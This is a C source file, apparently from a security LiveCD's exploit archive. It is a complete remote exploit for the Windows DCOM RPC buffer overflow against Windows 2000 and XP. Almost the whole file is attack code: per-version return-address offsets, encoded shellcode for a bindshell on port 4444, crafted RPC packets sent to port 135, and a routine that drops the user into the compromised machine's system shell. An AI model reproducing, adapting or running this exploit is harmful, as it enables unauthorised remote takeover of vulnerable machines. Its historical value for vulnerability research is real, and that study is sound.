home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / dcom.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  15KB  |  354 lines

  1. /*
  2.   DCOM RPC Overflow Discovered by LSD
  3.    -> http://www.lsd-pl.net/files/get?WINDOWS/win32_dcom
  4.    
  5.   Based on FlashSky/Benjurry's Code
  6.    -> http://www.xfocus.org/documents/200307/2.html
  7.    
  8.   Written by H D Moore <hdm [at] metasploit.com>
  9.    -> http://www.metasploit.com/
  10.    
  11.   - Usage: ./dcom <Target ID> <Target IP>
  12.   - Targets:
  13.   -          0    Windows 2000 SP0 (english)
  14.   -          1    Windows 2000 SP1 (english)
  15.   -          2    Windows 2000 SP2 (english)
  16.   -          3    Windows 2000 SP3 (english)
  17.   -          4    Windows 2000 SP4 (english)
  18.   -          5    Windows XP SP0 (english)
  19.   -          6    Windows XP SP1 (english)
  20.  
  21. */
  22.  
  23. #include <stdio.h>
  24. #include <stdlib.h>
  25. #include <error.h>
  26. #include <sys/types.h>
  27. #include <sys/socket.h>
  28. #include <netinet/in.h>
  29. #include <arpa/inet.h>
  30. #include <unistd.h>
  31. #include <netdb.h>
  32. #include <fcntl.h>
  33. #include <unistd.h>
  34.  
  35. unsigned char bindstr[]={
  36. 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
  37. 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
  38. 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
  39. 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
  40. 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
  41.  
  42. unsigned char request1[]={
  43. 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
  44. ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
  45. ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
  46. ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
  47. ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
  48. ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
  49. ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
  50. ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
  51. ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
  52. ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
  53. ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
  54. ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
  55. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
  56. ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
  57. ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  58. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
  59. ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
  60. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
  61. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
  62. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
  63. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
  64. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
  65. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
  66. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
  67. ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
  68. ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
  69. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
  70. ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  71. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  72. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  73. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  74. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
  75. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
  76. ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
  77. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
  78. ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
  79. ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
  80. ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
  81. ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  82. ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
  83. ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
  84. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
  85. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
  86. ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
  87. ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
  88. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  89. ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
  90. ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
  91. ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  92. ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
  93. ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
  94. ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  95. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
  96. ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
  97. ,0x00,0x00,0x00,0x00,0x00,0x00};
  98.  
  99. unsigned char request2[]={
  100. 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
  101. ,0x00,0x00,0x5C,0x00,0x5C,0x00};
  102.  
  103. unsigned char request3[]={
  104. 0x5C,0x00
  105. ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
  106. ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
  107. ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
  108. ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
  109.  
  110.  
  111.  
  112. unsigned char *targets [] =
  113.         {
  114.             "Windows 2000 SP0 (english)",
  115.             "Windows 2000 SP1 (english)",
  116.             "Windows 2000 SP2 (english)",
  117.             "Windows 2000 SP3 (english)",
  118.             "Windows 2000 SP4 (english)",
  119.             "Windows XP SP0 (english)",
  120.             "Windows XP SP1 (english)",
  121.              NULL                                                                                       
  122.         };
  123.         
  124. unsigned long offsets [] = 
  125.         {
  126.             0x77e81674, 
  127.             0x77e829ec, 
  128.             0x77e824b5, 
  129.             0x77e8367a, 
  130.             0x77f92a9b, 
  131.             0x77e9afe3,
  132.             0x77e626ba,
  133.         };
  134.  
  135. unsigned char sc[]=
  136.     "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
  137.     "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
  138.     "\x46\x00\x58\x00\x46\x00\x58\x00"
  139.  
  140.     "\xff\xff\xff\xff" /* return address */
  141.     
  142.     "\xcc\xe0\xfd\x7f" /* primary thread data block */
  143.     "\xcc\xe0\xfd\x7f" /* primary thread data block */
  144.  
  145.     /* port 4444 bindshell */
  146.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  147.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  148.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  149.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  150.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  151.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  152.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  153.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  154.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  155.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  156.     "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
  157.     "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
  158.     "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
  159.     "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
  160.     "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
  161.     "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
  162.     "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
  163.     "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"
  164.     "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
  165.     "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
  166.     "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
  167.     "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
  168.     "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
  169.     "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
  170.     "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
  171.     "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
  172.     "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
  173.     "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
  174.     "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
  175.     "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
  176.     "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
  177.     "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
  178.     "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
  179.     "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
  180.     "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
  181.     "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
  182.     "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
  183.     "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
  184.     "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
  185.     "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
  186.     "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
  187.     "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
  188.  
  189.    
  190.  
  191. unsigned char request4[]={
  192. 0x01,0x10
  193. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
  194. ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
  195. ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  196. };
  197.  
  198.  
  199. /* ripped from TESO code */
  200. void shell (int sock)
  201. {
  202.         int     l;
  203.         char    buf[512];
  204.         fd_set  rfds;
  205.  
  206.  
  207.         while (1) {
  208.                 FD_SET (0, &rfds);
  209.                 FD_SET (sock, &rfds);
  210.  
  211.                 select (sock + 1, &rfds, NULL, NULL, NULL);
  212.                 if (FD_ISSET (0, &rfds)) {
  213.                         l = read (0, buf, sizeof (buf));
  214.                         if (l <= 0) {
  215.                                 printf("\n - Connection closed by local user\n");
  216.                                 exit (EXIT_FAILURE);
  217.                         }
  218.                         write (sock, buf, l);
  219.                 }
  220.  
  221.                 if (FD_ISSET (sock, &rfds)) {
  222.                         l = read (sock, buf, sizeof (buf));
  223.                         if (l == 0) {
  224.                                 printf ("\n - Connection closed by remote host.\n");
  225.                                 exit (EXIT_FAILURE);
  226.                         } else if (l < 0) {
  227.                                 printf ("\n - Read failure\n");
  228.                                 exit (EXIT_FAILURE);
  229.                         }
  230.                         write (1, buf, l);
  231.                 }
  232.         }
  233. }
  234.  
  235.  
  236. int main(int argc, char **argv)
  237. {
  238.     
  239.     int sock;
  240.     int len,len1;
  241.     unsigned int target_id;
  242.     unsigned long ret;
  243.     struct sockaddr_in target_ip;
  244.     unsigned short port = 135;
  245.     unsigned char buf1[0x1000];
  246.     unsigned char buf2[0x1000];
  247.  
  248.     printf("---------------------------------------------------------\n");
  249.     printf("- Remote DCOM RPC Buffer Overflow Exploit\n");
  250.     printf("- Original code by FlashSky and Benjurry\n");
  251.     printf("- Rewritten by HDM <hdm [at] metasploit.com>\n");
  252.  
  253.  
  254.     if(argc<3)
  255.     {
  256.         printf("- Usage: %s <Target ID> <Target IP>\n", argv[0]);
  257.         printf("- Targets:\n");
  258.         for (len=0; targets[len] != NULL; len++)
  259.         {
  260.             printf("-          %d\t%s\n", len, targets[len]);   
  261.         }
  262.         printf("\n");
  263.         exit(1);
  264.     }
  265.  
  266.     /* yeah, get over it :) */
  267.     target_id = atoi(argv[1]);
  268.     ret = offsets[target_id];
  269.     
  270.     printf("- Using return address of 0x%.8x\n", ret);
  271.  
  272.     memcpy(sc+36, (unsigned char *) &ret, 4);
  273.  
  274.     target_ip.sin_family = AF_INET;
  275.     target_ip.sin_addr.s_addr = inet_addr(argv[2]);
  276.     target_ip.sin_port = htons(port);
  277.  
  278.     if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
  279.     {
  280.         perror("- Socket");
  281.         return(0);
  282.     }
  283.     
  284.     if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
  285.     {
  286.         perror("- Connect");
  287.         return(0);
  288.     }
  289.     
  290.     len=sizeof(sc);
  291.     memcpy(buf2,request1,sizeof(request1));
  292.     len1=sizeof(request1);
  293.     
  294.     *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;  
  295.     *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
  296.     
  297.     memcpy(buf2+len1,request2,sizeof(request2));
  298.     len1=len1+sizeof(request2);
  299.     memcpy(buf2+len1,sc,sizeof(sc));
  300.     len1=len1+sizeof(sc);
  301.     memcpy(buf2+len1,request3,sizeof(request3));
  302.     len1=len1+sizeof(request3);
  303.     memcpy(buf2+len1,request4,sizeof(request4));
  304.     len1=len1+sizeof(request4);
  305.     
  306.     *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
  307.     
  308.  
  309.     *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;  
  310.     *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
  311.     *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
  312.     *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
  313.     *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
  314.     *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
  315.     *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
  316.     
  317.     if (send(sock,bindstr,sizeof(bindstr),0)== -1)
  318.     {
  319.             perror("- Send");
  320.             return(0);
  321.     }
  322.     len=recv(sock, buf1, 1000, 0);
  323.     
  324.     if (send(sock,buf2,len1,0)== -1)
  325.     {
  326.             perror("- Send");
  327.             return(0);
  328.     }
  329.     close(sock);
  330.     sleep(1);
  331.     
  332.     target_ip.sin_family = AF_INET;
  333.     target_ip.sin_addr.s_addr = inet_addr(argv[2]);
  334.     target_ip.sin_port = htons(4444);
  335.  
  336.     if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
  337.     {
  338.         perror("- Socket");
  339.         return(0);
  340.     }
  341.     
  342.     if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
  343.     {
  344.         printf("- Exploit appeared to have failed.\n");
  345.         return(0);
  346.     }   
  347.     
  348.     printf("- Dropping to System Shell...\n\n");
  349.  
  350.     shell(sock);
  351.     
  352.     return(0);
  353. }
  354.